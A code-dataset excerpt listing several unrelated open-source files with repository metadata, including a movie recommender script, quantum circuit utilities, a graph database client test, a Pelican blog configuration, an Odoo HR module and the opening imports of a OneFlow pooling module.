hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
165c6758a989f8deab83e310fddd1fe121ef4cc3
| 1,093 |
py
|
Python
|
Content Based Filtering/ContentRecs.py
|
uboni/Project-B-Movie-Recommender-System
|
77390637a71b112651fcf92b767e27ca0d3ee8c7
|
[
"MIT"
] | 73 |
2019-05-08T05:59:53.000Z
|
2022-03-28T16:59:19.000Z
|
ContentBased/ContentRecs.py
|
mayank171986/Building-Recommender-Systems-with-Machine-Learning-and-AI
|
9e6dc58254ec1a2d2ca64c2f81a37f6390947701
|
[
"MIT"
] | 1 |
2021-02-07T18:01:54.000Z
|
2021-02-23T12:26:16.000Z
|
ContentBased/ContentRecs.py
|
mayank171986/Building-Recommender-Systems-with-Machine-Learning-and-AI
|
9e6dc58254ec1a2d2ca64c2f81a37f6390947701
|
[
"MIT"
] | 43 |
2019-07-18T03:26:22.000Z
|
2022-03-10T22:03:33.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri May 4 16:25:39 2018
@author: Frank
"""
from MovieLens import MovieLens
from ContentKNNAlgorithm import ContentKNNAlgorithm
from Evaluator import Evaluator
from surprise import NormalPredictor
import random
import numpy as np
def LoadMovieLensData():
ml = MovieLens()
print("Loading movie ratings...")
data = ml.loadMovieLensLatestSmall()
print("\nComputing movie popularity ranks so we can measure novelty later...")
rankings = ml.getPopularityRanks()
return (ml, data, rankings)
np.random.seed(0)
random.seed(0)
# Load up common data set for the recommender algorithms
(ml, evaluationData, rankings) = LoadMovieLensData()
# Construct an Evaluator to, you know, evaluate them
evaluator = Evaluator(evaluationData, rankings)
contentKNN = ContentKNNAlgorithm()
evaluator.AddAlgorithm(contentKNN, "ContentKNN")
# Just make random recommendations
Random = NormalPredictor()
evaluator.AddAlgorithm(Random, "Random")
evaluator.Evaluate(False)
evaluator.SampleTopNRecs(ml)
| 23.76087 | 83 | 0.729186 |
16c3995ab0c7ca8ca792150087c946c8acc9f38d
| 10,458 |
py
|
Python
|
utils.py
|
yue1234567/QuantumCircuitZJY
|
097275a633bc0f0c92bb14ad63e94f460fa8567d
|
[
"Apache-2.0"
] | 1 |
2021-06-15T11:19:43.000Z
|
2021-06-15T11:19:43.000Z
|
utils.py
|
yue1234567/QuantumCircuitZJY
|
097275a633bc0f0c92bb14ad63e94f460fa8567d
|
[
"Apache-2.0"
] | null | null | null |
utils.py
|
yue1234567/QuantumCircuitZJY
|
097275a633bc0f0c92bb14ad63e94f460fa8567d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from tqdm import tqdm
from ops import tensor_product, quantum_one, quantum_zero, quantum_eye, quantum_flip, MakeR, EPS, Fidelity, NormalizeAngle
class EnumAllCNOT(object):
def __init__(self, quantum_count, layer_count):
self.quantum_count = quantum_count
self.layer_count = layer_count
self.size = (quantum_count*(quantum_count-1))**layer_count
self.gen = self.Generator()
pass
def Generator(self):
cnot = np.zeros([self.layer_count, 2], dtype=int)
code = np.zeros([self.layer_count], dtype=int)
sel = []
for i in range(self.quantum_count):
for j in range(i+1, self.quantum_count):
sel.append((i, j))
sel.append((j, i))
D = len(sel)
while True:
for i in range(self.layer_count):
cnot[i]=sel[code[i]]
yield cnot
code[0]+=1
for i in range(self.layer_count):
if code[i]==D:
code[i]=0
if i+1<self.layer_count:
code[i+1]+=1
else:
break
def __len__(self):
return self.size
def __call__(self):
return self.gen.__next__()
def RandomCNOT(quantum_count):
i=j=0
while j==i:
i, j = np.random.randint(quantum_count, size=2)
return i, j
def RandomCNOTs(quantum_count, layer_count):
cnot = np.zeros([layer_count, 2], dtype=int)
for c in range(layer_count):
cnot[c, :] = RandomCNOT(quantum_count)
return cnot
class QSystem(object):
def __init__(self, layer_list, normalize=True):
self.layer_list = layer_list
self.quantum_count = layer_list[0].quantum_count
if normalize:
self.Normalize()
def __call__(self, quantum_status):
'''quantum_status: list or vector(np.matrix)'''
if isinstance(quantum_status, list):
quantum_status = tensor_product(quantum_status)
for layer in self.layer_list:
quantum_status = layer(quantum_status)
return quantum_status
def __len__(self):
return len(self.layer_list)
def Normalize(self):
for layer in self.layer_list:
if isinstance(layer, RLayer):
layer.Normalize()
@property
def matrix(self):
I = quantum_eye(self.quantum_count)
for layer in self.layer_list:
I = layer.matrix*I
return I
@property
def string(self):
return ''.join([layer.string for layer in self.layer_list])
class QLayer(object):
'''base layer'''
def __init__(self, quantum_count):
self.quantum_count = quantum_count
@property
def matrix(self):
'''get the matrix of the layer'''
raise NotImplementedError('matix must realize.')
@property
def string(self):
raise NotImplementedError('string must realize.')
def __call__(self, quantum_status):
if isinstance(quantum_status, list):
quantum_status = tensor_product(quantum_status)
# print(type(self.matrix), type(quantum_status))
return self.matrix * quantum_status
class RLayer(QLayer):
'''旋转门'''
def __init__(self, thetas, **kwargs):
super(RLayer, self).__init__(**kwargs)
if len(thetas) != self.quantum_count:
raise ValueError('theta count must be equal to quantum_count.')
self.thetas = thetas
def Normalize(self):
self.thetas = [NormalizeAngle(t) for t in self.thetas]
@property
def matrix(self):
return tensor_product([MakeR(t) for t in self.thetas])
@property
def string(self):
return ''.join(['R %d %.16f\n'%(i, t) for i,t in enumerate(self.thetas) if abs(t)>1e-8])
# return ''.join(['R %d %.16f\n'%(i, t) for i,t in enumerate(self.thetas)])
class CLayer(QLayer):
'''控制翻转门'''
def __init__(self, control_quantum, target_quantum, **kwargs):
super(CLayer, self).__init__(**kwargs)
if control_quantum>=self.quantum_count or target_quantum>=self.quantum_count or control_quantum==target_quantum:
raise ValueError('control=%d and target=%d is wrong in CLayer with quantum_count=%d'%(control_quantum, target_quantum, self.quantum_count))
self.control_quantum = control_quantum
self.target_quantum = target_quantum
@property
def matrix(self):
bit_c = 1<<(self.quantum_count-self.control_quantum-1)
bit_t = 1<<(self.quantum_count-self.target_quantum-1)
A = quantum_eye(self.quantum_count)
for i in range(1<<self.quantum_count):
if (i&bit_c)==bit_c and (i&bit_t)==0:
j = i|bit_t
A[[i,j],:]=A[[j,i],:]
return A
@property
def string(self):
return 'C %d %d\n'%(self.control_quantum, self.target_quantum)
class ILayer(QLayer):
'''恒等门'''
@property
def matrix(self):
return quantum_eye(self.quantum_count)
@property
def string(self):
return 'I\n'
def ParseToQSystem(s, quantum_count):
'''不能用于多重R的情况'''
layers = []
thetas = [0]*quantum_count
for line in s.split('\n'):
line = line.strip()
if len(line)!=0:
mark, p1, p2 = line.split(' ')
if mark == 'R':
# thetas = [0]*quantum_count
thetas[int(p1)]=float(p2)
elif mark == 'C':
layers.append(RLayer(thetas, quantum_count=quantum_count))
layers.append(CLayer(int(p1), int(p2), quantum_count=quantum_count))
thetas = [0]*quantum_count
if sum([abs(t) for t in thetas])>0:
layers.append(RLayer(thetas, quantum_count=quantum_count))
return QSystem(layers)
def CostCompute(s):
sc=0
for line in s.split('\n'):
if len(line)>0:
if line[0]=='R':
sc+=1
elif line[0]=='C':
sc+=8
return sc
def SearchParams(U, quantum_count, cnot_layers, EPOCH_STAGE_1=10000, EPOCH_STAGE_2=1000):
def MakeSystem(params, quantum_count=quantum_count, cnot_layers=cnot_layers):
layers = [RLayer(list(params[0]), quantum_count=quantum_count)]
for i, (c, t) in enumerate(cnot_layers):
layers.append(CLayer(c, t, quantum_count=quantum_count))
layers.append(RLayer(list(params[i+1]), quantum_count=quantum_count))
return QSystem(layers)
best_score = 0
param_size = (len(cnot_layers)+1, quantum_count)
for epoch in tqdm(range(EPOCH_STAGE_1)):
params = np.random.uniform(0, 2*np.pi, size=param_size)
model = MakeSystem(params)
M = model.matrix
score = Fidelity(U, M)
if score>best_score:
# print('epoch_%d, score = %g'%(epoch, score))
best_score = score
best_param = params
best_model = model.string
for eps in tqdm([1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8]):
for epoch in range(EPOCH_STAGE_2):
dt = np.random.uniform(-eps, eps, size=param_size)
params = best_param+dt
model = MakeSystem(params)
score = Fidelity(U, model.matrix)
if score>best_score:
# print('eps=%g, epoch=%d, score = %g'%(eps, epoch, score))
best_score = score
best_param = params
best_model = model.string
return best_score, best_model
def Minimize(func, x_min, x_max, EPS=1e-8):
alpha = (np.sqrt(5)-1)/2 # 0.618
x0=x_min
x3=x_max
x1=x3-alpha*(x3-x0)
x2=x0+alpha*(x3-x0)
y1=func(x1)
y2=func(x2)
while x2-x0>EPS:
if y1<y2:
x0=x1
x1=x2
y1=y2
x2=x0+alpha*(x3-x0)
y2=func(x2)
else:
x3=x2
x2=x1
y2=y1
x1=x3-alpha*(x3-x0)
y1=func(x1)
x = (x1+x2)/2
return x
if __name__ == '__main__':
layer1 = RLayer([0, 1.5], quantum_count=2)
layer2 = ILayer(quantum_count=2)
layer3 = RLayer([0, 1.5], quantum_count=2)
model = QSystem([layer1, layer2, layer3])
print('Model matrix:')
print(model.matrix)
q0 = quantum_zero()
q1 = quantum_one()
q = tensor_product([q0, q1])
print('Quantum status:')
print(model(q).transpose())
print('Model string:')
print(model.string)
print('Test C2Layer')
C2Layer = lambda:CLayer(0,1,quantum_count=2)
model = C2Layer()
q0 = quantum_zero()
q1 = quantum_one()
q = tensor_product([q0, q1])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q1, q0])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q0, q0])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print()
q = tensor_product([q1, q1])
print('Init status:')
print(q.transpose())
print('After C2Layer:')
print(model(q).transpose())
print('CNOT(0,1):')
layer = CLayer(0,1,quantum_count=2)
print(layer.matrix, '\n')
print('CNOT(1,0):')
layer = CLayer(1,0,quantum_count=2)
print(layer.matrix, '\n')
print('CNOT(1,2):')
layer = CLayer(1,2,quantum_count=3)
print(layer.matrix, '\n')
print('CNOT(2,0):')
layer = CLayer(2,0,quantum_count=3)
print(layer.matrix, '\n')
print('Test enum:')
creator = EnumAllCNOT(3, 2)
print('len = ', len(creator))
for _ in range(5):
print(creator())
from Reader import ReadSystem
S1 = QSystem([
RLayer([-0.5,0,8], quantum_count=3),
CLayer(1, 2, quantum_count=3),
RLayer([-1.5,1,3], quantum_count=3),
], normalize=False)
U1 = S1.matrix
print('Before:')
print(S1.string)
S1.Normalize()
print('After:')
print(S1.string)
U2 = S1.matrix
print('Fidelity:', Fidelity(U1, U2))
| 31.405405 | 152 | 0.566265 |
4c0c8145a3473773605b7beb636b70a124d80710
| 228 |
py
|
Python
|
Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/35for_else/35for_else.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
"""
For / Else em python
"""
variavel = ['Luiz Otavio', 'Joãozinho', 'Maria']
for valor in variavel:
print(valor)
if valor.startswith('M'):
print('Começa com J', valor)
else:
print('Não começa com J')
| 22.8 | 48 | 0.592105 |
d5dd2ca3988da35c7474b49e0ec3dbdf7606fe39
| 3,846 |
py
|
Python
|
graph-test.py
|
WeiwenRen/PyHugeGraph
|
e09430da5a5b93fbafd1de02f8c4545bd1f0afd7
|
[
"Apache-2.0"
] | 11 |
2018-09-06T10:36:02.000Z
|
2021-03-18T16:15:30.000Z
|
graph-test.py
|
WeiwenRen/PyHugeGraph
|
e09430da5a5b93fbafd1de02f8c4545bd1f0afd7
|
[
"Apache-2.0"
] | null | null | null |
graph-test.py
|
WeiwenRen/PyHugeGraph
|
e09430da5a5b93fbafd1de02f8c4545bd1f0afd7
|
[
"Apache-2.0"
] | 2 |
2019-12-09T07:21:04.000Z
|
2021-06-07T02:30:10.000Z
|
from neo4j.v1 import GraphDatabase
from PyHugeGraph import PyHugeGraphClient
if __name__ == '__main__':
hg = PyHugeGraphClient.HugeGraphClient("http://loaclhost:8090", "hugegraph")
print hg.graph
print hg.get_all_graphs().response
print hg.get_vertex_by_id("123").response
print hg.get_all_vertelabels().response
# print hg.GetAllGraphs().response
# print hg.GetVersion().response
# print hg.GetGraphInfo().response
# print hg.CreatePropertyKey('testname', 'TEXT', 'SINGLE').response
print hg.get_graph_allpropertykeys().response
# print hg.GetGraphPropertykeysByName("testname").response
# print hg.DeleteGraphPropertykeysByName("curltest").status_code
# user_data = {
# "min": 0,
# "max": 100
# }
# print hg.AddPropertykeyUserdata("age",user_data).response
# print hg.DeletePropertykeyUserdata("age", {"min": 0}).response
# ------------------------------------------
# data = {
# "name": "person",
# "id_strategy": "DEFAULT",
# "properties": [
# "name",
# "age"
# ],
# "primary_keys": [
# "name"
# ],
# "nullable_keys": [],
# "enable_label_index": True
# }
# print hg.CreateVertexLabel(data).response
# properties = ["reason",]
# userdata = {
# "super": "animal"
# }
# print hg.AddVertexLabelProperties("person",properties).response
# print hg.AddVertexLabelUserdata("person",userdata).response
# print hg.DeleteVertexLabelUserdata("person",userdata).response
# print hg.GetVerteLabelByName("person").response
# print hg.GetAllVerteLabels().response
# ------------------------------------------
# data = {
# "name": "created",
# "source_label": "person",
# "target_label": "person",
# "frequency": "SINGLE",
# "properties": [
# "time"
# ],
# "sort_keys": [],
# "nullable_keys": [],
# "enable_label_index": True
# }
# # print hg.CreateEdgeLabel(data).response
# properties = [
# "type"
# ]
# nullable_keys = [
# "type"
# ]
# # print hg.AddEdgeLabelProperties("created", properties, nullable_keys).response
# userdata = {
# "min": "1970-01-01"
# }
# # print hg.AddEdgeLabelUserdata("created",userdata).response
# # print hg.DeleteEdgeLabelUserdata("created",userdata).response
# print hg.GetEdgeLabelByName("created").response
# print hg.GetEdgeLabelByName("created").status_code
# print hg.DeleteEdgeLabelByName("created").response
# print hg.GetEdgeLabelByName("created").response
# # print hg.GetAllEdgeLabels().response
# print hg.GetVertexByCondition("character").response
# print hg.GetVertexById("1:hydra").response
# print hg.GetVertexByCondition("").response
# print hg.GetVertexByPage(4, "AAuGMTpoeWRyYWcBEQAAAAA=").response
# print hg.GetEdgeByCondition().response
# print hg.GetEdgeByPage(3).response
# print hg.GetEdgeByID("S1:pluto>4>>S2:tartarus").response
# print hg.TraverserShortestPath("1:hercules", "1:pluto", "OUT", 2).response
# print hg.TraverserKout("1:hercules", "OUT", 1).response
# print hg.TraverserKneighbor("1:hercules", "OUT", 2).response
# ids = ["1:jupiter", "1:cerberus", "2:tartarus", "1:alcmene", "1:hydra", "2:sky", "1:saturn", "1:pluto",
# "1:hercules", "1:neptune", "1:nemean"]
# print hg.TraverserVertices(ids).response
# print hg.CreateVariables("title","test").response
# print hg.UpdateVariables("title","testnew").response
# print hg.GetAllVariables().response
# print hg.GetVariablesByKey("title").response
# print hg.DeleteVariables("title").response
# print hg.GetAllVariables().response
| 38.46 | 109 | 0.615705 |
e69559ebb952b172d5826c0b1ff0fedb231d8b03
| 408 |
py
|
Python
|
addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 1,329 |
2021-01-13T07:06:30.000Z
|
2022-03-31T07:23:39.000Z
|
addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 115 |
2021-01-13T10:42:57.000Z
|
2022-03-28T03:57:52.000Z
|
addition_module/face_mask_adding/FMA-3D/utils/cython/setup.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 351 |
2021-01-13T07:21:00.000Z
|
2022-03-29T14:11:39.000Z
|
'''
@author: cbwces
@date: 20210419
@contact: [email protected]
'''
from setuptools import setup, Extension
from Cython.Build import cythonize
import numpy
ext_modules = [
Extension(
"render",
["render.pyx"],
extra_compile_args=['-fopenmp'],
extra_link_args=['-fopenmp'],
)
]
setup(
ext_modules=cythonize(ext_modules),
include_dirs=[numpy.get_include()]
)
| 17.73913 | 40 | 0.659314 |
5d4962ebca12db7d9c5d60c7a06167558d7495d4
| 1,245 |
py
|
Python
|
chapter_seven/building_a_python_model/numpy_model.py
|
PacktPublishing/Speed-up-your-Python-with-Rust
|
1fce5fb59ea966015768e7eca51c0e31d69531ec
|
[
"MIT"
] | 21 |
2021-09-10T12:46:26.000Z
|
2022-03-23T02:50:39.000Z
|
chapter_seven/building_a_python_model/numpy_model.py
|
PacktPublishing/Speed-up-your-Python-with-Rust
|
1fce5fb59ea966015768e7eca51c0e31d69531ec
|
[
"MIT"
] | null | null | null |
chapter_seven/building_a_python_model/numpy_model.py
|
PacktPublishing/Speed-up-your-Python-with-Rust
|
1fce5fb59ea966015768e7eca51c0e31d69531ec
|
[
"MIT"
] | 6 |
2021-09-02T08:32:37.000Z
|
2022-03-17T21:15:25.000Z
|
import numpy as np
class MatrixModel:
@property
def weights_matrix(self) -> np.array:
return np.array([
[3, 2],
[1, 4]
])
def calculate_times(self, distance: int,
traffic_grade: int) -> dict:
inputs = np.array([
[distance],
[traffic_grade]
])
result = np.dot(self.weights_matrix, inputs)
return {
"car time": result[0][0],
"truck time": result[1][0]
}
def calculate_parameters(self, car_time: int,
truck_time: int) -> dict:
inputs = np.array([
[car_time],
[truck_time]
])
result = np.dot(np.linalg.inv(self.weights_matrix),
inputs)
return {
"distance": result[0][0],
"traffic grade": result[1][0]
}
if __name__ == "__main__":
test = MatrixModel()
times = test.calculate_times(distance=10, traffic_grade=3)
print(f"here are the times: {times}")
parameters = test.calculate_parameters(
car_time=times["car time"], truck_time=times["truck time"]
)
print(f"here are the parameters: {parameters}")
| 24.411765 | 66 | 0.513253 |
53cf91710589936dd8752f38b18fc803aedf413e
| 2,239 |
py
|
Python
|
pelicanconf.py
|
pythonquick/innernet-blog
|
d62ad9b64a93ea1539d15827a7940837f87f3175
|
[
"MIT"
] | null | null | null |
pelicanconf.py
|
pythonquick/innernet-blog
|
d62ad9b64a93ea1539d15827a7940837f87f3175
|
[
"MIT"
] | null | null | null |
pelicanconf.py
|
pythonquick/innernet-blog
|
d62ad9b64a93ea1539d15827a7940837f87f3175
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
AUTHOR = 'Guenther'
SITENAME = 'innernet'
SITEURL = 'http://localhost:8000'
SITELOGO = 'https://s.gravatar.com/avatar/fcfe36f97f3eb56b69ecce65d0c895dc?s=80'
ROBOTS = 'index, follow'
SITEMAP = {
'format': 'xml',
'priorities': {
'articles': 0.5,
'indexes': 0.5,
'pages': 0.5
},
'changefreqs': {
'articles': 'monthly',
'indexes': 'daily',
'pages': 'monthly'
}
}
PATH = 'content'
#THEME = '../pelican-themes/Flex'
#THEME = '../github/Flex'
#THEME = '../github/lannisport'
#THEME = '../github/pelican-mg'
#THEME = '../github/MinimalXY'
#THEME = '../github/pelican-cait'
THEME = '../github/plumage'
#THEME = '../github/pelican-elegant'
MENUITEMS = (('Categories', '/categories.html'),
('Tags', '/tags.html'),
('Archives', '/archives.html'),)
MAIN_MENU = True
TIMEZONE = 'America/New_York'
DEFAULT_LANG = 'en'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
DISPLAY_CATEGORIES_ON_MENU = False
# Blogroll
#LINKS = (('Pelican', 'http://getpelican.com/'),
# ('Python.org', 'http://python.org/'),
# ('You can squash those links in your config file', '#'),)
LINKS = ()
# Social widget
SOCIAL = (('GitHub', 'https://github.com/pythonquick'),
('Twitter', 'https://twitter.com/pythonquick'),)
DEFAULT_PAGINATION = 10
PLUGIN_PATHS = ['../github/pelican-plugins']
#PLUGINS = ['gravatar', u'disqus_static', 'sitemap']
PLUGINS = ['gravatar', 'sitemap']
#DISQUS_SITENAME = u'innernet-1'
#DISQUS_SECRET_KEY = os.environ["DISQUS_SECRET_KEY"]
#DISQUS_PUBLIC_KEY = u'jHOTvv9aBxf7cXnuBJpPne1SHzMNwMZLFghMrhzBVAx0m3fomH3yulPKaaXJW0k4'
#COPYRIGHT = u'© 2018 Guenther Haeussermann'
SITE_THUMBNAIL = 'https://s.gravatar.com/avatar/fcfe36f97f3eb56b69ecce65d0c895dc?s=80'
STATIC_PATHS = ["extras"]
EXTRA_PATH_METADATA = {
'extras/robots.txt': {'path': 'robots.txt'}
}
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
SITESUBTITLE = "A developer's blog"
| 26.975904 | 88 | 0.670835 |
54fef41e30838bf329ca8f50c5ce5e2a5fa44c17
| 268 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/src/item.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# items implementation
class Item:
def __init__(self, item_name, item_description):
self.item_name = item_name
self.item_description = item_description
def __str__(self):
return '%s, %s' % (self.item_name, self.item_description)
| 24.363636 | 65 | 0.675373 |
ab4ebd6255f4b428c623c0dbbaaf9eb0ccdea384
| 429 |
py
|
Python
|
INBa/2015/ZORIN_D_I/task_2_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/ZORIN_D_I/task_2_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/ZORIN_D_I/task_2_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 2. Вариант 7.
# Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание, автором которого является Стендаль. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
# Krasnikov A. S.
# 19.03.2016
print("Будем трудиться, потому что труд - это отец удовольствия.")
print("\n\n Cтендаль")
input("\n\nНажмите Enter для выхода.")
| 53.625 | 201 | 0.689977 |
91e5a09ac4781c9aa53955f5af697cf6376d37fc
| 1,634 |
py
|
Python
|
db_init.py
|
AuxiliumCDNG/MET-Bot
|
7e00d878c92ad4f68b0b2920235019e14c9ea2fa
|
[
"MIT"
] | null | null | null |
db_init.py
|
AuxiliumCDNG/MET-Bot
|
7e00d878c92ad4f68b0b2920235019e14c9ea2fa
|
[
"MIT"
] | null | null | null |
db_init.py
|
AuxiliumCDNG/MET-Bot
|
7e00d878c92ad4f68b0b2920235019e14c9ea2fa
|
[
"MIT"
] | null | null | null |
from globals import connection_pool
def init():
with connection_pool.connection() as con, con.cursor(dictionary=True) as cursor:
cursor.execute("CREATE TABLE IF NOT EXISTS settings ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"setting VARCHAR(100),"
"value VARCHAR(100)"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS konvois ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"name VARCHAR(255),"
"description TEXT,"
"truckersmp TEXT,"
"date DATE,"
"gather TIME,"
"time TIME,"
"start VARCHAR(255),"
"finish VARCHAR(255),"
"pause VARCHAR(255),"
"server VARCHAR(255),"
"token VARCHAR(100)"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS konvoi_updates ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"konvoi_id INT,"
"text TEXT,"
"picture MEDIUMBLOB"
")")
cursor.execute("CREATE TABLE IF NOT EXISTS presence ("
"id INT PRIMARY KEY NOT NULL AUTO_INCREMENT,"
"user_id BIGINT UNSIGNED,"
"konvoi_id INT,"
"status VARCHAR(255)"
")")
con.commit()
cursor.close()
| 43 | 84 | 0.433905 |
53693c2098532b89e5b246198bb277e313c22d49
| 3,612 |
py
|
Python
|
models/hr_employee.py
|
DevCriUd/hr_cgt
|
5db7c173b937fd156b365d17ddf9bd6d86638315
|
[
"Apache-2.0"
] | null | null | null |
models/hr_employee.py
|
DevCriUd/hr_cgt
|
5db7c173b937fd156b365d17ddf9bd6d86638315
|
[
"Apache-2.0"
] | null | null | null |
models/hr_employee.py
|
DevCriUd/hr_cgt
|
5db7c173b937fd156b365d17ddf9bd6d86638315
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
class FullEmployee(models.Model):
_inherit = 'hr.employee'
# Compute
@api.multi
def _compute_documents_count(self):
docs = self.env['hr.documents']
for employee in self:
employee.documents_count = docs.search_count(
[('employee', '=', employee.id)]
)
@api.multi
def _compute_documents_reminder(self):
today = fields.Date.from_string(fields.Date.today())
for record in self:
# init
deadline_expired = False
deadline_warning = False
deadline_total = 0
deadline_name = ''
diff_record = float("inf")
log_documents = self.env['hr.documents'].search(
[
('employee', '=', record.id),
('state', '=', 'todo')
]
)
# for each documents linked
for document in log_documents:
# check deadline by date
if document.deadline_date:
deadline_date_obj = fields.Date.from_string(
document.deadline_date
)
diff = (deadline_date_obj - today).days
if diff < 0:
# deadline per data scaduta
deadline_expired = True
deadline_total += 1
elif (diff >= 0 and
diff < document.default_warning_limit_date_hr):
# deadline per data in scadenza
deadline_warning = True
deadline_total += 1
if diff < diff_record:
# save documents name if this
# is a more immediate deadline
deadline_name = document.document_type.name
diff_record = diff
record.deadline_expired = deadline_expired
record.deadline_warning = deadline_warning
record.deadline_total = deadline_total - 1
record.deadline_name = deadline_name
# Fields
driver_vector_info = fields.Text(
string='Driver Vector info'
)
documents_count = fields.Integer(
string='Documents',
compute=_compute_documents_count
)
log_documents = fields.One2many(
comodel_name='hr.documents',
inverse_name='employee',
string='Documents'
)
deadline_expired = fields.Boolean(
string='Document Expired',
compute=_compute_documents_reminder
)
deadline_warning = fields.Boolean(
string='Document Expiration Warning',
compute=_compute_documents_reminder
)
deadline_total = fields.Integer(
compute=_compute_documents_reminder
)
deadline_name = fields.Char(
compute=_compute_documents_reminder
)
# Methods
@api.multi
def return_action_to_open_empl(self):
self.ensure_one()
xml_id = self.env.context.get('xml_id')
if xml_id:
res = self.env['ir.actions.act_window'].for_xml_id(
'hr_cgt', xml_id
)
res.update(
context=dict(
self.env.context,
default_employee=self.id,
group_by=False),
domain=[('employee', '=', self.id)]
)
return res
return False
| 29.129032 | 73 | 0.527685 |
72fcee1493f195ec3bae74593e478750b54bd8d2
| 23,803 |
py
|
Python
|
python/oneflow/compatible/single_client/nn/modules/pooling.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 1 |
2021-09-13T02:34:53.000Z
|
2021-09-13T02:34:53.000Z
|
python/oneflow/compatible/single_client/nn/modules/pooling.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/compatible/single_client/nn/modules/pooling.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 1 |
2021-01-17T03:34:39.000Z
|
2021-01-17T03:34:39.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional
from oneflow.compatible import single_client as flow
